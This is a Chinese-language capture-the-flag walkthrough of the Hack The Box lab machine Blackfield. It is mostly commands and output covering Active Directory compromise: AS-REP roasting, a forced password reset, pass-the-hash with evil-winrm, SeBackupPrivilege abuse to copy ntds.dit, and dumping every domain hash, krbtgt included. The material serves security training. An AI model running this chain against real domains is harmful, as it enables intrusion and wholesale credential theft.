靶机 | 信息 |
---|---|
状态 | 退役 |
难度 | Hard |
IP | / |
地址 | https://app.hackthebox.com/machines/Blackfield |
价格 | 需要订阅 14$ /20 $ /月 |
端口扫描
└──╼ #nmap -p- --min-rate=1000 -T4 10.129.229.17
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-14 14:14 GMT
Nmap scan report for 10.129.229.17
Host is up (0.30s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
5985/tcp open wsman
端口测试
SMB_匿名登陆
└─\ ✨ smbclient -N -L \\10.129.229.17
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
└─\ ✨ smbmap -u guest -p '' -H 10.129.229.17
[+] IP: 10.129.229.17:445 Name: 10.129.229.17 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share
重点查看profiles$
,获得所有可能存在的用户名
└─**\ ✨** smbclient -N \\\\10.129.229.17\\profiles$ -c 'ls' | grep -v '\.' | awk -F ' ' '{print $1}' > all_users.txt
LDAP_389
扫描出域名
nmap --script="ldap*" 10.129.229.17
或者使用windapsearch
python3 /opt/windapsearch/windapsearch.py --dc-ip 10.129.229.17 -u guest -p ''
python3 /opt/windapsearch/windapsearch.py --dc-ip 10.129.229.17 -u '' -p ''
获得域名为blackfield.local
88_kerberos-sec
枚举目标域中的用户账户
└─\ ✨ kerbrute userenum -d blackfield.local --dc 10.129.229.17 all_user.txt
2024/03/17 21:01:17 > Using KDC(s):
2024/03/17 21:01:17 > 10.129.229.17:88
2024/03/17 21:01:42 > [+] VALID USERNAME: audit2020@blackfield.local
2024/03/17 21:04:04 > [+] VALID USERNAME: svc_backup@blackfield.local
2024/03/17 21:04:04 > [+] VALID USERNAME: support@blackfield.local
获得三个用户,存为names.txt
audit2020
svc_backup
support
查看是否存在Do not require Kerberos preauthentication
的用户
GetNPUsers.py -no-pass -usersfile names.txt blackfield.local/ -dc-ip 10.129.229.17
Impacket v0.12.0.dev1+20240208.120203.63438ae7 - Copyright 2023 Fortra
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:21d7bf606b28356c2f5752983263025e$df6cd8800906d957156c6fa47754b611cc00013ec32b482ad47d9aa98c507513dff10e1c60d72aecc1001e16eb1bb225582f214e069a107c07c57dc3ab79ebbf8437d138247a7b2b4087a646de47a7ad5658b5a45a2810dcbe701804254a9df4bcfd0e58afd8b227550151164a965e9ba2a9760defc243a74e50aaed9e1818f2e8d9ad032343bae16c270e1952c12b37834fca851143c2f91e4982eaf0d8263858a7431d6c823cf160260a93245a98af162d4afb50fe4f7aa4d189806d54242539520391d6d546f1618f7af141579a1ddf5f8b305d3cc3a652a002a14fa067a686e1ee00dea5862ee40ad56e812b3a919dc73562
使用hashcat破解krb5asrep
,模式为18200
获得一对凭据support:#00^BlackKnight
获取密码策略
└─# crackmapexec smb 10.129.229.17 -u support -p '#00^BlackKnight' --pass-pol
SMB 10.129.229.17 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.229.17 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.129.229.17 445 DC01 [+] Dumping password info for domain: BLACKFIELD
SMB 10.129.229.17 445 DC01 Minimum password length: 7
SMB 10.129.229.17 445 DC01 Password history length: 24
SMB 10.129.229.17 445 DC01 Maximum password age: 41 days 23 hours 53 minutes
SMB 10.129.229.17 445 DC01
SMB 10.129.229.17 445 DC01 Password Complexity Flags: 000001
SMB 10.129.229.17 445 DC01 Domain Refuse Password Change: 0
SMB 10.129.229.17 445 DC01 Domain Password Store Cleartext: 0
SMB 10.129.229.17 445 DC01 Domain Password Lockout Admins: 0
SMB 10.129.229.17 445 DC01 Domain Password No Clear Change: 0
SMB 10.129.229.17 445 DC01 Domain Password No Anon Change: 0
SMB 10.129.229.17 445 DC01 Domain Password Complex: 1
SMB 10.129.229.17 445 DC01
SMB 10.129.229.17 445 DC01 Minimum password age: 1 day 4 minutes
SMB 10.129.229.17 445 DC01 Reset Account Lockout Counter: 30 minutes
SMB 10.129.229.17 445 DC01 Locked Account Duration: 30 minutes
SMB 10.129.229.17 445 DC01 Account Lockout Threshold: None
SMB 10.129.229.17 445 DC01 Forced Log off Time: Not Set
密码喷洒
将密码存到文件password.txt
中,使用crackmapexec进行密码喷洒
crackmapexec smb IP -u names.txt -p password.txt --continue-on-success
确实目前只能获得一对凭据support:#00^BlackKnight
winrm
失败
提权
横向移动
BloodHound-Python
对域环境进行评估和分析
bloodhound-python -c All -d blackfield.local -u support -p '#00^BlackKnight' -ns 10.129.229.17 --zip
启动neo4j
,启动BloodHound
,导入扫描的结果
support用户可以强制修改audit2020密码
net rpc password "audit2020" "St4rry2024" -U blackfield.local/support%"#00^BlackKnight" -S 10.129.229.17
将密码加入到password.txt
还可以进行密码喷洒
audit2020用户可以访问smb的forensic目录
挂载到攻击机
└─**\ ✨** mount -t cifs -o username=audit2020,password=St4rry2024 //10.129.229.17/forensic /mnt/forensic/
在memory_analysis
目录下获得lsass.dmp
的内存转储数据,可以使用pypykatz
进行分析
$ pypykatz lsa minidump lsass.DMP
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
DPAPI: 240339f898b6ac4ce3f34702e4a89550
使用9658d1d1dcd9250115e2205d9f48400d
可以登陆到svc_backup的winrm
evil-winrm -i IP -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
> whoami /priv
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
纵向移动
提权参考Windows和域控制器Backup Operatorst利用的不同之处
创建文件svc_backup.dsh
set context persistent nowriters
add volume c: alias svc_backup
create
expose %svc_backup% z:
上传到目标靶机
cd C:\Temp
upload svc_backup.dsh
diskshadow /s svc_backup.dsh
robocopy /b z:\windows\ntds . ntds.dit
备份reg save hklm\system c:\Temp\system
,然后download
最后secretsdump.py -ntds ntds.dit -system system.bak local
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:f60b9b99c0ab58be3ba963f1efe29c5f:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::